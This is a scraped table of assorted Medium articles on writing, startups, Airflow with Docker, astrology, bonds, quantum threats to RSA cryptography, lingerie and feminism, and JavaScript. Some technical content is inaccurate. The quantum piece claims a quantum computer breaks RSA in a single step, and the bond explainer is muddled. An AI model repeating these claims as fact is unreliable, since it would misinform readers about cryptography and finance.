title
stringlengths 1
200
⌀ | text
stringlengths 10
100k
| url
stringlengths 32
829
| authors
stringlengths 2
392
| timestamp
stringlengths 19
32
| tags
stringlengths 6
263
|
---|---|---|---|---|---|
How to write, I mean, how I can tell myself to write
|
Write oh write.
How to write?
Can we start with the generic question and don’t worry you can always answer with whatever style you like, meaning, you can play top down or bottom up.
Well, technically speaking, you just need to open up your laptop and open any type of apps that allow you to type (well, that’s for writing by using computer)
if you like to use your hand, you can have paper or any medium you like that can handle written gesture. And of course, you need to have that pencil or pen. You get the idea.
Then, you can see that blank page of paper or that blank page of screen. And if you want to write, you can write any word that will form a sentence that will form a paragraph in that blank page.
As you go by writing, you can see that the page is eventually to be filled with words that are actually deeper that just merely words.
Those may have ideas, messages, thoughts, feelings, something that may not exist without you write that down.
And thanks to you, you bring those into existence.
Because you write it down.
|
https://medium.com/@1percent-progress/how-to-write-i-mean-how-i-can-tell-myself-to-write-927c94b91981
|
['Sandro Sirait']
|
2020-12-26 00:12:31.583000+00:00
|
['Thinking', 'Questions', 'Writing']
|
About Felicia C. Sullivan
|
The Details: It’s About Experience…And Being Human
A data-driven marketer and storyteller for over two decades, who has straddled the agency and client-side fences, I deliver simple solutions to complex problems. I care about customer lifetime value over campaign ROI.
My 3-step brand-building method — where your customers are the hero of the story — sets me apart from the pack. Customers aren’t a line item on a P&L — they’re discerning and overwhelmed by choice. We live in an era where problem-solving isn’t enough. Values are no longer a tagline.
Being decent is not a campaign.
I help businesses build better brands for customers that demand we be better humans.
My experience has cultivated an enviable reputation for delivering the wow factor, backed by a sound brand and storytelling strategy that drives long-term business results.
I’ve been telling stories since I was six and I haven’t shut up since.
TL;DR: I make marketing simple.
|
https://medium.com/@felsull/about-felicia-c-sullivan-1c2bc76f0e28
|
['Felicia C. Sullivan']
|
2021-03-25 00:59:39.987000+00:00
|
['Felicia C Sullivan', 'Marketing', 'About Me', 'Freelancing']
|
Entrepreneurship can‘t be taught
|
Business skills can be taught; entrepreneurial qualities like grit and risk tolerance are inborn.
So can entrepreneurship be taught? Most entrepreneurs and investors seem to think the answer is ‘no’. Most academicians and students think the answer is ‘yes’. — Amity University
I sincerely believe that exceptional entrepreneurs have what it takes in them from the day they were born, and I think most psychologists will agree with me. We’re talking about the unicorns; the ones that make it to a respectable IPO. Why? Let me explain with a simple but intuitive analogy.
Entrepreneurs are born, not bred
How does one cultivate a great world class musician, say a pianist? First you gather all the young kids who can play the instrument. You then ask respectable piano teachers to evaluate who had the innate talent and aptitude to go far. And then you get these teachers to take them under their wings and put them through years of rigorous training and dedication to the craft.
You do not however, make playing the piano seem very cool and glamorous to attract general interest in all children, get a bunch of people who have never played the piano to evaluate them, and then choose a large number as apprentices and hope that eventually a few of them would achieve greatness.
The same could be said of any other achievements that require a lot of talent, determination and passion to succeed. I believe being a successful entrepreneur falls into such a category, having failed miserably in one attempt, achieved minor success in another, and met and talked with many who fell into both ends of the spectrum.
Encouraging entrepreneurial ‘spirit’
Some governments or academic institutions believe that encouraging entrepreneurial spirit is the key to creating more successful entrepreneurs. I believe that is a mistake. Getting more people to try does not increase the odds of getting successful startups .
The Oxford Dictionary defines ‘spirit’ as “the prevailing or typical quality, mood or attitude of a person, group or period of time”. By this very definition it implies that any ‘spirit’ is temporary in nature.
Rather than developing an overall sense of ‘entrepreneurial spirit’, it might be better to identify individuals with inherently strong entrepreneurial qualities that will last — passion, grit, resourcefulness, risk-taking aptitude — and giving them the encouragement and assistance they need to fully develop their potential over the long and obstacle laden process they will surely face.
It’s cool to do a startup
With big money and so much glamour propaganda injected into entrepreneurship these days, I have met many young founders doing startups because it is now ‘cooler’ and less boring than working in a big corporation. They also tend to choose popular themes such as Artificial Intelligence or Blockchain because it’s easier to get investors’ attention. They quote Jack Ma or Steve Jobs as role models and use popular lingo like solving “pain points” that venture capitalists love to hear in pitches.
|
https://lancengym.medium.com/entrepreneurship-cant-be-taught-980380d2423d
|
['Lance Ng']
|
2018-11-21 01:13:14.664000+00:00
|
['Startup Lessons', 'Startup', 'Entrepreneurship', 'Entrepreneur', 'Founders']
|
no. 7 — Midnight Matinee by Brass Bed
|
If you read the earlier posts (no worries if you didn’t), you’d know that my mom used to run an online music magazine and get hundreds of unsolicited CD submissions mailed to our house every month. Once the shelves in her office were full, the CDs piled into the living room shelves. Then, they’d be stacks on the office floor. Finally, they filled huge plastic bins that we kept in the basement. Even after my mom no longer ran the magazine, bands would send CDs and EPs and singles, hoping to be reviewed by my mom and her team of writers.
When my friends and I were really bored, or when I was tired of listening to the same three albums over and over, we’d go down into the office or the basement and rummage through the CDs, hoping to find something good. A lot of the time, whenever we slid the CD into the DVD player and blasted it over the TV speakers, the music was not great. But every now and then, we’d find gems.
Brass Bed was the first band I found out of those piles that I loved. It really felt like I picked them like a needle from a haystack. I loved them a little extra because they were a band my mom didn’t know; I found them before she did, which made them more special. When your mom is a music expert, you gotta find your niche somewhere. I found that niche in the pop guitar, horns, and unexpected do-op, almost country-like harmonies that back what is ultimately an indie-rock band. At the time, this album was only a few years old, and searching their band name on google yielded almost no results. Now, though, they have multiple albums out, a tiny desk, and enough fame to be found on all major streaming platforms. However, they still feel like my little secret.
I’m not sure what it is that makes Brass Bed feel different from other bands. Maybe someone who understands music theory can tell me, but when their song Olivia comes on shuffle while I’m driving around, I still lose my damn mind. If you listen to any song on this album, listen to Olivia. Some songs are for rainy days, some for sunny days, some for winter and some for summer. This song is for anything and everything. It is perfect for all weather. Any time I’m in an ok mood, this song cheers me up. Any time I’m in a good mood, this song matches it. Maybe it’s the horns, or the way the song stops right when it reaches its groove and grows in a new crescendo. Or maybe it’s just rad. If you listen, let me know what you think.
You can listen here
|
https://medium.com/@jennasylvester/no-7-midnight-matinee-by-brass-bed-25e394bd200e
|
['Jenna Sylvester']
|
2020-11-24 03:37:54.804000+00:00
|
['Album Review', 'Nonbinary', 'Music', 'Brass Bed', 'Personal Essay']
|
Black founders can pitch for a $100,000 investment
|
Panel discussion during Capital Factory’s 2019 Black in Tech Summit
Black founders can pitch for a $100,000 investment
On February 16th, during Capital Factory’s Black in Tech Summit, five technology startup finalists will be judged by a panel of successful entrepreneurs, industry leaders and mentors. One startup will walk away with a $100,000 investment that day!
Who can apply?
Any tech or consumer startup with a black founder can apply to pitch at our Black in Tech Summit.
The best opportunity and pitch will receive:
Admission to Capital Factory’s VIP Accelerator
$100,000 cash investment on a SAFE or Convertible Note using Capital Factory’s term sheet and your most recent funding valuation
Access to the Capital Factory Mentor network
Up to $250,000 in potential total hosting credits from AWS, Google Cloud, Microsoft Asure and other major hosting providers (each individual offer is different and subject to change)
Featured on an episode of Capital Factory’s Austinpreneur podcast
Think you’ve got a shot at $100,000? Apply now to be one of five teams selected to pitch. You could walk away with $100,000 and a new home at the Center of Gravity for Entrepreneurs in Texas! Application deadline is January 22.
Want a chance to pitch? Submit your application
Who has won Capital Factory’s Black in Tech Investments before?
Winners include thriving Texas startups like Dallas-based ShearShare, Houston-based GroupRaise, and Austin-based Journey Foods. We’ve helped winners connect with customers, mentors, and secure capital from Google, Revolution’s Rise of the Rest Fund, Backstage Capital, and many other VC investors.
Dallas’ ShearShare has a marketplace connecting stylists with available seats at salons and $2.3 million in funding
Houston’s GroupRaise is a marketplace that helps groups of 20–200 people make reservations at restaurants willing to donate a percentage of the sales back to a charitable cause.
Austin’s Journey Foods uses AI to create sustainability recipes for food manufacturers.
|
https://austinstartups.com/black-founders-can-pitch-for-a-100-000-investment-c72393ef20fe
|
['Capital Factory']
|
2020-12-18 01:28:16.577000+00:00
|
['Fundraising', 'Austin', 'News', 'Startup', 'Pitching']
|
Containerizing Data Workflows
|
Containerizing Data Workflows
(And How to Have the Best of Both Worlds)
By Tian Xie
As a data technology company, Enigma moves around a lot of data, and one of our main differentiators is linking nodes of seemingly unrelated public data together into a cohesive graph. For example, we might link a corporate registration to a government contract, an OSHA violation, a building violation, etc. This means we not only work with lots of data, but lots of different data, where each dataset is a unique snowflake slightly different from the next.
Wrangling high quantities and varieties of data requires the right tools, and we’ve found the best results with Airflow and Docker. In this post, I’ll explain how we’re using these, a few of the problems we’ve run into, and how we came up with Yoshi, our handy workaround tool.
If you work in data technologies, you’ve probably heard of Airflow and Docker, but for those of you who need a quick introduction…
Introducing Airflow
Airflow is designed to simplify running a graph of dependent tasks. Suppose we have a process where:
There exist five tasks: A, B, C, D, and E, and all need to complete successfully.
B, C and E depend on the successful completion of A.
D depends on the successful completion of B and C.
Considering each task as a node and each dependency as an edge forms a directed acyclic graph — or DAG for short.
If you are familiar with DAGs (or looked them up just now on “Cracking the Coding Interview”), you might think that if a DAG can be reasoned within the time of a job interview, then it can’t be that complex, right? In production, these systems are much more complex than a single topological sort. Questions such as “how are DAGs started?” or “how is the state of each DAG saved?” and “how is the next node started?” are answered by Airflow, which has led to its wide-spread adoption.
Scaling Airflow
In order to understand how Docker is used, it’s important to first understand how Airflow scales. The simplest implementation of Airflow could live on a single machine where:
DAGs are expressed as python files stored on the file system.
Storage is written to SQLite.
A webserver process serves a web admin interface.
A scheduler process forks tasks (the nodes in the DAG) as separate worker processes.
Unfortunately, this system can only scale to the size of the machine. Eventually, as DAGs are added and more throughput is needed, the demands on the system will exceed the size of the machine. In this case, airflow can expand to a distributed system.
The airflow webserver and scheduler continue running on the same master instance where DAG files are stored.
The scheduler connects to a database running on another machine to save state.
The scheduler connects to redis and uses celery to dispatch work to worker instances running on many worker machines.
Each worker machine can also run multiple airflow worker processes.
Now this system can scale to as many machines as you can afford,* solving the scaling problem! Unfortunately, switching to a distributed system generally exchanges scalability for infrastructural complexity — and that’s certainly the case here. Whereas it is easy to deploy code to one machine, it becomes exponentially harder to deploy to many machines (exponentially since that is the number of permutations of configuration that can go wrong).
If a distributed system is necessary, then it’s very likely that not only is the number of workers very high, but also the number of DAGs. A large variety of DAGs means a large variety of different sets of dependencies. Over time, updating every DAG to the latest version will become unmanageable and dependencies will diverge. There are systems for managing dependencies in your language of choice (e.g. virtualenv, rubygems, etc) and even systems for managing multiple versions of that language (e.g. pyenv, rbenv), but what if the dependency is at an even lower level? What if it depends on a different operating system?
Containerizing Workflows
Docker to the rescue!
Unless you have been living in a container (ha-ha) for the last five years, you’ve probably heard of containers. Docker is a system for building light-weight virtual machines (“images”) and running processes inside those virtual machines (“containers”). It solves both of these problems by keeping dependencies in distinct containers and moving dependency installation from a deploy process into the build process for each image.
When the code for a DAG (henceforth, this set of code will be referred to as a “workflow”) is pushed our remote git host and CI/CD system, it triggers a process to build an image. An image is built with all of the dependencies for the workflow and pushed to a remote docker repository, making it accessible via URL. At the same time, the airflow python DAG file is written. Rather than executing from the DAG directly, it specifies a command to execute in the docker image. At run-time, airflow executes the DAG, thereby running a container for that image. This pulls the image from the docker repository, thereby pulling its dependencies.
Docker is not a perfect technology. It easily leads to docker-in-docker inception-holes and much has been written about its flaws, but nodes in a DAG are an ideal use-case. They are effectively enormous idempotent functions — code with input, output and no side-effects. They do not save state nor maintain long-lived connections to other services — two of the more frequently cited problems with Docker.
A Double-Edged Sword?
Docker exchanges loading dependencies at run-time for loading dependencies at build time. Once an image has been built, the dependencies are frozen. This is necessary to separate dependencies, but becomes an obstacle when multiple DAGs share the same dependency. When the same library upgrade needs to get delivered to multiple images, the only solution is to rebuild each image. Though it may sound far-fetched, this situation comes up all the time:
A change to an external API requires an update in all client applications.
A security flaw in a deeply nested dependency needs a patch.
DRY = “Don’t Repeat Yourself” is one of the central tenets of good software development, which should lead to shared libraries.
Code Injection
The double-edged sword endemic to Docker containers should sound familiar to anyone working with static builds. One common approach to solving this problem is to use plug-ins loaded at run-time. At Enigma, we developed a similar approach for Docker containers that we named Yoshi (hence, the Nintendo theme for this entire blog post).
As previously noted, when a workflow is pushed to our remote git repository and CI/CD system, it triggers an automated process to build an image for that workflow including installing all of its dependencies. Yoshi is a python package that is included as one of these dependencies and gets frozen on the image. Since different workflows change at different rates, they go through the build process at different times and wind up with different versions. This is the nature of working with docker images. Yoshi is also directly installed onto the machine where the airflow worker runs. The latest version is always installed on these machines. At runtime, when the airflow worker executes the docker command, it mounts its local install of Yoshi onto the docker container. This injects the latest Yoshi code into that container, thereby updating Yoshi in the container to the latest version.
By keeping code we suspected might need to be updated frequently in Yoshi, keeping the interface to Yoshi stable and injecting the latest code at run-time, we are able to update code instantly across all workflows.
The Best of Both Worlds?
Injecting code at run-time allowed us to use all of the benefits of Docker containers, but also create exceptions when we needed. At first, this seemed like the best of both worlds, but over time we ran into flaws:
A stable interface and backwards compatibility are absolutely essential for allowing newer versions of a library to overwrite an older version, but that’s easier said than done. Maintaining compatibility across hundreds of workflows with different edge cases is even more challenging. Coming from working with containerized processes also required forming some new habits. No code is one-hundred-percent bug-free, but this led to many more bugs than we anticipated. The most frequent use-case for Yoshi was for clients to access external resources. When external resources changed, Yoshi changed with them, which meant that older versions no longer worked. An image is expected to work forever, but the absence of the latest version of Yoshi broke that expectation. Did I say that the most frequent use-case for Yoshi was for clients to access external resources? Turns out that was the only use-case. Initially, we expected to use Yoshi in many different ways, but wound up using it in the same place every time. This meant Yoshi was much larger and more complex than necessary and we only needed it in one node of the DAG.
Yoshi caused more bugs and complexity than we wanted, but by revealing where our code changed most frequently, it also revealed a simpler way to deploy updates across many DAGs.
Image Injection
Heretofore, images were built one-to-one for each DAG, but it does not have to be that way. Each workflow has its own set of dependencies, so an image is built for those dependencies, but each node in the DAG could use a different image. Additionally, Docker images are referenced by URL. The image stored for that URL can change without changing the URL. This means that a DAG node executing the same image URL, could execute different images.
Eventually, this led us to inject code by inserting updated images in the middle of a DAG.
The Yoshi library remained the same, with all of the same functionality, except now it was also packaged and executable from its own docker image. Workflows were changed so that individual DAG nodes could use different image URLs. Nodes where our code interacted with external resources now used the Yoshi image instead of the workflow image. The URL for the Yoshi image were resolved at run-time with environment variables from the machine so that different environments could use different URLs — e.g. staging could use an image tagged as staging and same for production. When changes to the Yoshi library were pushed to our remote git repository, our CI/CD system built a new image and pushed it to the Docker repository at those URLs. At run-time, the workflow pulls the latest Yoshi image.
Image injection not only allowed us to build workarounds to the double-edged sword of static Docker images — without the compatibility challenges of code injection — but building a Yoshi image also opened new doors to run Yoshi utilities from a command-line anywhere and run a Yoshi service.
It took us a long time to get there, but our final solution allowed us to have the best of both worlds, and then some.
Game Over.
*There is a limit to the number of machines that can connect to the same redis host, but that is most likely a lower limiting factor — especially for a start-up.
|
https://medium.com/enigma-engineering/containerizing-data-workflows-95df1d338048
|
[]
|
2019-04-12 17:32:29.857000+00:00
|
['Airflow', 'Docker', 'Data Engineering', 'Gitlab', 'Engineering']
|
Simplify And Streamline
|
Desk Photo by Ylanite Koppens from Pexels
DAILY ASTRO
Friday, July 2, 2021
Sun in Cancer 10° 55′
10° 55′ Last Quarter Waning Moon in Aries , VOC 4:14am July 3–12:27pm July 3 UTC
, VOC 4:14am July 3–12:27pm July 3 UTC Prominent Planets: Mars
Prominent Mode: Mutable
Prominent Element: Fire
Prominent Aspect: Sextile
Retrogrades : Jupiter Rx, Saturn Rx, Neptune Rx, Pluto Rx, Juno Rx
: Jupiter Rx, Saturn Rx, Neptune Rx, Pluto Rx, Juno Rx Fixed T-Square
Grand Fire Trine
Trine Mars square Uranus (Exact on Sunday)
Uranus (Exact on Sunday) Saturn Rx sextile Chiron
It’s a great day to change something so actions are more efficient in order to reduce stress and enjoy life. Where are you scattering your energy? Open, honest communication works best today, if you have the courage.
Mars in Leo continues its standoff in a Fixed T-square with Saturn Rx and Uranus with Venus trying to join the party. Meanwhile, the waning Moon in Aries sextiles Mercury and squares Pluto Rx today.
Anxiety or pressure may be coming from the tension of trying to drive fast with the brakes on. Thoughts, words, actions, AND emotions may all be racing, and yet nothing seems to really go anywhere… at least not as fast as you would like.
With Saturn in its domicile, usually it would be best to stick to the usual routine. But Saturn is retrograde and Mars and Uranus need something to change.
Facing an issue DIRECTLY and doing something DIFFERENT this time is highly rewarded.
Facing a concern head on is not for the faint of heart, and yet you’ll find it wasn’t as big of a problem as you thought. In fact, you can even use the issue to make your life easier, more relaxed, beautiful, or enjoyable. What honestly feels BEST to you? You can go ahead and do THAT.
RELATIONSHIPS: Some people may need lots of space and no pressure before they feel safe to come out of their shell or open up in vulnerability. Some may feel defensive, or there may be conflict if someone feels constricted. Allowing individuals to be themselves constitutes harmony. People learn best through their own choices and experiences.
Follow the Daily Astrology Forecast at intuitivefish.com for conscious awareness and practical life guidance.
|
https://medium.com/@intuitivefish/simplify-and-streamline-454ba814e7fc
|
['Intuitive Fish']
|
2021-07-02 16:45:45.397000+00:00
|
['Zodiac', 'Astrology', 'Efficiency', 'Dailyastrology', 'Astrologyupdates']
|
What is a Bond?
|
A bond is a type of loan usually issued by banks and other large institutions with the agreement that the borrower will pay back the money either during the term or at the end of the term with interest charged. If you are looking to buy a bond, you will need to know the bond market and what each bond means. It is very important to understand what the purpose of a bond is and how it is classified in the market.
Understanding bond market is also important for people who are interested in purchasing bonds so that they can purchase the bonds they need for their investments and portfolios.
Bond means a financial investment with two primary functions: to earn dividends for the bond issuer or to borrow against the principal. There are different types of bonds — federal, state, municipal, corporate, agency, and mortgage-backed securities. The face value of the bond is the amount of money you will receive at the end of maturity. The maturity is the time period between when you first purchase a bond and when you can legally sell the bond.
Most people purchase bonds as a safe haven investment. The tax structure of most bonds makes them tax-deferred investments. Federal bonds are those that are guaranteed by the U.S. Government. State and municipal bonds are issued by local governments. The face value is generally the same for all bonds. However, if the face value is different, the yield to maturity may vary.
What is a Bond in Stocks?
For people who are planning to start investing in stocks or bonds, then they need to know the concept of bond investing and how to calculate bond order. A bond is an unsecured loan where collateral or security is given. The term “bond” is derived from the French word which means bond. So, bond investing is defined as the buying and selling of bonds for profit or loss.
To calculate bond yield, one has to understand the yield curve, which is usually represented graphically as line drawing depicting exponential rise and fall in value over a period of time. By knowing the date of arrival of maximum returns on bonds, one can easily find out the time limit for the maximum return. Therefore, when you plan to buy bonds, try to invest in those with the lowest return dates.
For people who do not have any problem in understanding concepts of bond investing, then it would be better to stick to the technical side and calculate high bond yield through the use of other methods. The calculative bonds will allow a person to know the interest rate to be paid on the money and the coupon rate for bonds with the lowest coupon rate and the highest rate of return.
There are many other methods of calculating yield such as the amortization schedule method, breakeven analysis, and historical yields. Before investing in stocks, bonds, or both, it is always wise to compare prices of different companies so that one can have an idea of the profit margin.
|
https://medium.com/@joliver02051991/what-is-a-bond-a2d988045a60
|
[]
|
2020-12-18 07:54:37.105000+00:00
|
['Bonds', 'Bond Yield', 'Stocks', 'Loans', 'Investment']
|
Modern Cryptography is Doomed.
|
Quantum computing is set to destroy cryptography as we know it.
Image Creds: Quanta Magazine
Everything from files on our hard drives to confidential Internet traffic is encrypted by the same system. The system makes up the base of modern cryptography.
This system is called RSA cryptography. (It’s doomed, but we’ll get there).
We could talk about the nitty-gritty of the system for a while but the basic point is that it generates keys by multiplying really big prime numbers.
It might sound too simple to be true. Our world’s most secure messages are guarded by multiplication?! But it’s actually a really smart idea.
To hack RSA cryptography, you’d have to find the prime factors of the generated keys. While any computer can multiply two really prime numbers, almost no computer can find the prime factors of that number. The computer would have to sit there and run through every possibility. They’d never get the job done. (In under a trillion years, that is).
Wait. I said almost no computer can break RSA. That’s because a new field of computers is emerging. These computers possess the power to rattle RSA cryptography’s spine.
These are quantum computers.
Quantum computers are weird. They have a bunch of really crazy properties that I talk about here. They’re able to perform operations on qubits in superposition which allows them to reduce the time complexity of a problem exponentially. What would take a classical computer ²³⁵⁰⁰⁰⁰⁰ steps, it would take a quantum computer ONE.
That means that instead of aimlessly searching possibilities to hack RSA, you could get it in ONE try.
Yeah, when quantum computers come, RSA’s done for.
RSA on the run
Let’s break this down more though.
Shor’s Algorithm
In 1994, a scientist, Peter Shor, wrote an algorithm. At this time, the idea of quantum computing was entirely theoretical. Nobody wanted to build one because there was no apparent purpose. This algorithm changed that.
Shor’s algorithm showed that a properly functioning quantum computer could solve problems that classical computers never would. It kicked off the race to building a quantum computer.
The algorithm is a 3-part answer to the problem of prime factorization. The first part is performed on a classical computer in polynomial time, but it is only the set-up for the second and most important part. The second part requires the use of specially constructed quantum circuits to perform the quantum computation needed to find the value you need for the third part, which allows you to find the prime factors of the integer on a classical computer.¹
It’s a Future Thing.
Sadly, the algorithm is here but the computers aren’t. Even when Peter Shor came up with it in 1994, he knew it would take an advanced quantum computer to break RSA cryptography.
Luckily (or unluckily), we’re not too far away from developing quantum computers that can break RSA. Most people think that it’ll happen in around a decade.
The best part is that even though RSA cryptography is screwed, we’re not. Cryptographers have already begun research into Post-Quantum Cryptography to make sure we’re able to keep everything secure after quantum arrives.
Here’s What I Did.
I wanted to see Shor’s Algorithm in action. So I made it happen.
There are tons of ways online for people to gain access to quantum simulators and code quantum algorithms. I thought it’d be pretty cool to code Shor’s algorithm and run it on a real simulator at IBM.
Here’s a little snippet of my code
I coded Shor’s algorithm on Qiskit Aqua and ran it on IBM’s simulators. The process wasn’t too bad because there’s a ton of open-source code out there for similar algorithms.
My results weren’t perfect. But it’s only a simulator after all. It didn’t always end up working and completely stopped when the numbers got too high.
But that’s ok. This is only a glimpse of what a true quantum computer can do. We’re just hanging on until the real ones show up.
|
https://medium.com/@anishamusti/modern-cryptography-is-doomed-8256f1ef465a
|
['Anisha Musti']
|
2019-12-01 17:00:00.419000+00:00
|
['Quantum Computing', 'Rsa Encryption', 'Quantum Cryptography', 'Post Quantum Cryptography', 'Quantum']
|
經典網路系列(11) — DCGAN
|
gitE0Z9/classical-network-series
GitHub is home to over 50 million developers working together to host and review code, manage projects, and build…
|
https://medium.com/@acrocanthosaurus627/%E7%B6%93%E5%85%B8%E7%B6%B2%E8%B7%AF%E7%B3%BB%E5%88%97-11-dcgan-40a78e279030
|
['Mz Bai']
|
2020-12-13 12:35:12.218000+00:00
|
['Gan', 'Deep Learning', 'Pytorch']
|
A Medium Writer Sent My Family a Box Full of Rainbows and Unicorns
|
My daughter and I received a package in the mail yesterday from my writer friend Shannon Ashley, wrapped up with sparkly pink duct tape.
I looked inside and immediately started to cry.
You see, I’m in a bunch of Facebook groups for Medium writers. In one of the smaller groups, writer Kyrie Gray leads a weekly Rant Thread, where for 24 hours we can rant all we want — about work or anything else.
Every week, people pour out their hearts, and every week, other Medium writers reply to the rants with kindness, empathy, and understanding.
This alone is heartwarming, but this week, things got next-level for me.
The Rant Thread came at a good time. I haven’t had a super-viral article in a while, and I was feeling overwhelmed and afraid I wouldn’t be able to keep building on my writing successes. And as I wrote my rant, I arrived at the root of it all: money. Money worries underscore all the other worries.
I commented that, since my kid started kindergarten, she’s somehow ripped holes in the knees of every pair of her size 4T pants. The weather’s getting colder, and I was sending my child to school in pants with holes in them. I was ready to prioritize getting her new pants, but in the meantime, I really needed to rant, to cry about how sick I am of working so hard and still being low-income.
Shannon, with her heart of gold, got my address over PM, and it was only a couple days later we received her package full of unicorns and rainbows.
Shannon’s daughter’s the same age as mine, so I expected a box of hand-me-downs — which would’ve been incredible on its own— but it was clear Shannon and her daughter specifically chose some things just for my daughter.
I felt her kindness and her friendship in the thoughtful items in this box: a rainbow hair bow and unicorn dress my daughter received just in time for School Picture Day; a Snoopy book about being “brave and kind,” the very words my daughter’s teacher used for her when she named her Star Student of the Week in kindergarten.
Shannon’s daughter made my daughter a drawing of flowers and smiling butterflies. I can’t wait for my daughter to mail some art back.
The amazing package we received! (Photo credit: Author)
And Shannon even included a gift card, with a note that it was for me to use on myself. She’s written about how difficult it is as a mom to prioritize yourself, and I feel this so much. I used part of the gift card immediately, and bought myself new underwear for the first time since my daughter was 1. I also treated myself to a little milk steamer so I can make soy lattes at home.
Too often I hear Conservative talking points about how “handouts” will make people lazy. Honestly, I was just the recipient of a whole lot of generosity, and right now, I feel the opposite of lazy.
I feel inspired. I feel grateful. Dare I say it, I feel #blessed!
I want to believe that I deserve nice stuff. And more than anything, I want to pay it forward.
Regardless of how much money we make or don’t make, we can find ways to give to others. And when we make more money, that can be an opportunity to find even more ways to be generous.
“Our friends are so generous,” I gushed. “I want to be generous like that too.”
“Me too!” my daughter said. “I want to be generous like that too!”
|
https://medium.com/warm-hearts/a-medium-writer-sent-my-family-a-box-full-of-rainbows-and-unicorns-1d6da7721539
|
['Darcy Reeder']
|
2019-10-09 23:27:26.612000+00:00
|
['Life Lessons', 'Writing', 'Kindness', 'Gratitude', 'Empathy']
|
How Lingerie Empowers Women to Embrace Their Sexuality
|
Photo by Melnychuk Nataliya on Unsplash
From the iconic French label, Eres to high street brands Boux Avenue and Ann Summers, the connotations associated with women’s undergarments are fascinating. Feminism and lingerie have always had a rocky relationship, as historically, women’s undergarments have been utilised both as a means of expression and repression. The trend in the last 50 years has moved away from protecting chastity towards pushing for more liberated ideas about women’s rights to express their sexuality. Think of Madonna’s iconic Gaultier corset during her 1980s Blonde Ambition Tour which paved the way for new interpretations of traditional undergarments in the following decades. However, the lingerie industry is still looked down on by some due to its reputation for pandering to a supposed male fantasy.
Tyra Banks at the 2005 Victoria’s Secret Fashion Show
Social dress codes traditionally appear to express greater concern about controlling women’s sexuality and bodies in comparison to their male counterparts. But, in recent years, the perception of the lingerie industry has been going through a dramatic shift. The early 2000s saw big brands such as Victoria’s Secret begin promoting increasingly erotic advertising campaigns, consequently furthering the objectification of women in the media. However, now many women are turning away from tight push-up bras in favour of more comfortable and supportive brands like Neon Moon and Toru & Naoko, which reflect changing cultural attitudes on diversity, body positivity and gender fluidity. The once-celebrated Victoria’s Secret has become outdated following controversies over its limited, narrow-minded portrayal of female beauty. In contrast, SavagexFenty has been celebrated for its inclusive casting and designs for every shape, size and skin tone.
I grew up in a conservative subculture. While at school, the lengths of girls’ skirts were measured with rulers to ensure modesty and female students were forced to cover up in the classroom in case their bodies distracted male students. This sends the message that male students education and classroom comfort is more important than female, and validates the societal fixation on women’s bodies resulting in us being seen mainly as sexual objects for consumption. Consequently, we are prevented from being valued for our brains, interests, and achievements, resulting in the subsequent policing of women’s bodies and activities that is so familiar in British society.
In 2003, a study was published by Martie G. Haselton about gender-based differences in sexual misperception. In 2014, this study was replicated by Norwegian psychologist Mons Bendixen to examine the cultural differences in a more sexually liberated country. It was discovered that men are much more likely to misinterpret interactions with women as sexual, something that many of my female peers can relate to. For example, a woman bending over to pick up a pencil might be interpreted by a man as signifying sexual attraction.
This over-sexualisation is a concept familiar to a significant proportion of women. Many of us experienced it from the onset of puberty, when we received our first catcalls as our bodies started to change, and when boys began to equate our worth to our bra sizes. As a 15-year-old, I began experiencing an onslaught of unwelcome sexual attention — from my classmates, strangers in the street, even my family — and I unconsciously began to adjust my behaviour. I didn’t want to attract anyone who would feel entitled to objectify my body.
As a mixed-race woman, I also discovered that my ethnicity was often linked with fetishisation, simply based on preconceptions harboured over how a BME person is supposed to be. The sexualisation of BME people has its roots in history as well as modern media. We are portrayed as promiscuous, flirtatious and accepting of sexual propositions, serving only to silence our reactions and objections as “abnormal” before they’re even expressed. The message society dictated was clear — I had to cover my body, inhibit my expression, personality, and hobbies to be seen as someone worthy of safety and respect. So, I cultivated my “nerdy” side, wore baggy clothes and neglected my appearance to stop unwanted physical interactions and comments, in the hopes that I would no longer receive this negative attention.
Oversexualisation forces society to see women in a way that restricts self-expression — a right that everyone should have. Our culture is too caught up in what can be considered a sexual economy, which is the belief that “sex sells,” driving the mindset of younger girls that their appearance is their most important quality. Resulting in that instead of embracing who they are, they focus on sexualising themselves to convince society of their worth.
Today’s new visual language and increasing focus on diverse, natural beauty as well as prioritising comfort show that fashion can benefit our well-being and perception of self. And now, more than ever, this is a message that is resonating with women who — rather than have their mental health eroded by unachievable images of over-sexualised perfection and limitations due to enforced modesty — are demanding to be represented by the brands they choose to wear.
This is where lingerie comes in. Wearing lingerie is an important statement a woman can make about herself. It allows her to choose when she’s sexualised, and by whom, taking away the control and entitlement that some people have in viewing women as sexual objects. And therefore, sending a message to society that it is her body and her choice, and she can wear whatever she wants.
References:
Image 2: victoria’s secret | Athena LeTrelle | Flickr
Academic Studies
The Sexual Overperception Bias: Evidence of a Systematic Bias in Men From a Survey of Naturally Occurring Events | Royal Holloway, University of London (talis.com)
https://journals.sagepub.com/doi/pdf/10.1177/147470491401200510
|
https://medium.com/@matildabrighstone/how-lingerie-empowers-women-to-embrace-their-sexuality-b671c91a2d70
|
['Matilda Brighstone']
|
2020-12-13 19:03:14.545000+00:00
|
['Empowerment', 'Fashion', 'Lingerie', 'Feminism', 'Sexuality']
|
Case study: An “o”de to great characters
|
For this concept, I picked two HBO characters (Carrie Bradshaw and Tony Soprano) and one major WB character, Batman (of course, for myself). I broke the user’s name out of the original gradient ring and placed it below the avatar for practical purposes (I wonder how they deal with long names — smaller size fonts?), but also to give each profile picture some breathing room.
The subtle differentiation between my redesign concept and other services is I chose to substitute these character avatars in for the “filled” center circle within the iconic “O” of HBO’s wordmark. If you kind of blur your eyes, the homage is a bit more obvious, but I wanted to give a nod to the prestigious namesake of this new service. I used the same purple they use in their branding, but dialed down the transparency to put the focus on the characters and to give the screen a slightly more distinguished feel vs. the purple gradient from the original rings.
I’m super excited to see what HBO Max has in store for the future, both content-wise and design-wise. There’s a lot of opportunity for them to take their massive library of characters and make the service into a true Netflix competitor. Hopefully they’re already working on something like this now — because I really, really want to be Batman.
|
https://bootcamp.uxdesign.cc/an-o-de-to-great-characters-ed809dddb0d6
|
['Eric Saber']
|
2020-12-21 02:12:47.817000+00:00
|
['UX Design', 'Case Study', 'UI Design', 'Product Design', 'HBO']
|
JavaScript Basics — Generators and the Web
|
Photo by Krzysztof Niewolny on Unsplash
JavaScript is one of the most popular programming languages in the world. To use it effectively, we’ve to know about the basics of it.
In this article, we’ll look at how to define and use generators and web communication.
Generators
Generator functions let us create functions that can be paused and resumed.
It’s indicated by the functuion* keyword.
